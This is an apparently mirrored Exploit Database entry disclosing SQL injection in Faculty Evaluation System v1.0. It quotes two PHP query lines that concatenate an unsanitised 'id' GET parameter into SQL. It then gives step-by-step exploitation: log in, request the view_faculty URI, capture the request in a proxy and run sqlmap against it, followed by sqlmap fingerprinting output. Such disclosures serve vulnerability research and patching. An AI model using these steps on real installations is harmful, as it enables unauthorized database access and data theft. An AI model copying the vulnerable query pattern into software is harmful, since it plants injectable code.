Faculty Evaluation System v1.0 – SQL Injection

• Exploit Database
• 18 阅读

• 作者： Andrey Stoykov
  日期： 2023-07-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51573/

• # Exploit Title: Faculty Evaluation System v1.0 - SQL Injection
  # Date: 07/2023
  # Exploit Author: Andrey Stoykov
  # Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
  # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip
  # Version: 1.0
  # Tested on: Windows Server 2022
  
  
  SQLi #1
  
  File: edit_evaluation
  
  Line #4
  $qry = $conn->query("SELECT * FROM ratings where id = ".$_GET['id'])->fetch_array();
  [...]
  
  
  SQLi #2
  
  File: view_faculty.php
  
  Line #4
  
  // Add "id" parameter after "view_faculty" parameter then add equals "id" with integer
  [...]
  $qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array();
  [...]
  
  
  Steps to Exploit:
  
  1. Login to application
  2. Browse to following URI "http://host/eval/index.php?page=view_faculty&id=1"
  3. Copy request to intercept proxy to file
  4. Exploit using SQLMap
  
  
  sqlmap -r test.txt--threads 1 --dbms=mysql --fingerprint
  
  [...]
  [INFO] testing MySQL
  [INFO] confirming MySQL
  [INFO] the back-end DBMS is MySQL
  [INFO] actively fingerprinting MySQL
  [INFO] executing MySQL comment injection fingerprint
  back-end DBMS: active fingerprint: MySQL >= 5.7
   comment injection fingerprint: MySQL 5.6.49
   fork fingerprint: MariaDB
  [...]